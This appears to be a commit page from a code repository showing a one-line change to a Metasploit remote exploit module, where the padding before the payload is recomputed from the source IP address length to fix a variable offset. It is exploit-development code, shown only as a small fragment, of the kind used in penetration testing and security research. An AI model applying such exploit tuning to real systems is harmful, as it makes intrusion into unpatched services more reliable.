trying to fix the variable offset length
parent
9cea2d9af9
commit
a0b4045b4b
|
@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
prio << ">"
|
||||
|
||||
message = prio
|
||||
message << rand_text_alpha(11)
|
||||
message << rand_text_alpha(9 + (15 - Rex::Socket.source_address(datastore['RHOST']).length)) # Allow to handle the variable offset due to the source ip length
|
||||
message << get_payload
|
||||
|
||||
print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...")
|
||||
|
|
Loading…
Reference in New Issue